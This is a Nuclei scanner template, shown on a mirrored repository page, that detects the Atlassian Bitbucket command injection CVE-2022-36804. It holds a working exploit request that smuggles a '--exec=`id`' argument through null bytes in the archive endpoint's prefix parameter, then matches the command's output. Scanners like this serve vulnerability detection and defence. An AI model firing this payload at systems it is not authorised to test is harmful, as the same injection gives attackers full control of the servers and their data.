daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2022/CVE-2022-36804.yaml

72 lines
2.5 KiB
YAML
Raw Blame History

id: CVE-2022-36804
info:
name: Atlassian Bitbucket - Remote Command Injection
author: DhiyaneshDk,tess,sullo
severity: high
description: |
Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1.
reference:
- https://github.com/notdls/CVE-2022-36804
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
- https://jira.atlassian.com/browse/BSERV-13438
- https://nvd.nist.gov/vuln/detail/CVE-2022-36804
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-36804
cwe-id: CWE-77
cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
epss-score: 0.97247
metadata:
max-request: 2
shodan-query: http.component:"BitBucket"
tags: cve,cve2022,bitbucket,atlassian,kev
variables:
data: '{{rand_base(5)}}'
http:
- raw:
- |
GET /rest/api/latest/repos HTTP/1.1
Host: {{Hostname}}
- |
GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1
Host: {{Hostname}}
iterate-all: true
extractors:
- type: json # type of the extractor
part: body
name: key
json:
- '.["values"] | .[] | .["project"] | .key'
internal: true
- type: json # type of the extractor
part: body
name: slug
json:
- '.["values"] | .[] | .slug'
internal: true
- type: regex
group: 1
regex:
- 'uid=.*\(([a-z]+)\):'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "com.atlassian.bitbucket.scm.CommandFailedException"
- type: status
status:
- 500
# Enhanced by md on 2023/04/10
Reference in New Issue View Git Blame Copy Permalink